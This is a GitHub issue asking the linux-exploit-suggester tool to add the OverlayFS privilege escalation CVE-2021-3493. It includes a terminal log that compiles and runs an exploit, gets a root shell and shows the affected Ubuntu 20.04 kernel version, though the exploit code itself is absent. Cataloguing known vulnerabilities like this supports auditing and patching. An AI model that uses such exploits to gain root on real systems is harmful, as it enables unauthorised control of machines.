linux-exploit-suggester icon indicating copy to clipboard operation
linux-exploit-suggester copied to clipboard

Add OverlayFS cap_convert_nscap (CVE-2021-3493)

Open bcoles opened this issue 4 years ago • 0 comments

Unfortunately the src-url is a reupload. The original exploit is embedded in the advisory page. There's no direct link.

user@ubuntu:~/Desktop$ gcc overlayfs.c 
user@ubuntu:~/Desktop$ ./a.out 
bash-5.0# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1000(user),1002(wireshark)
bash-5.0# uname -a
Linux ubuntu 5.8.0-48-generic #54~20.04.1-Ubuntu SMP Sat Mar 20 13:40:25 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
bash-5.0# cat /etc/lsb-release 
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.2 LTS"
bash-5.0# 

bcoles avatar Apr 20 '21 12:04 bcoles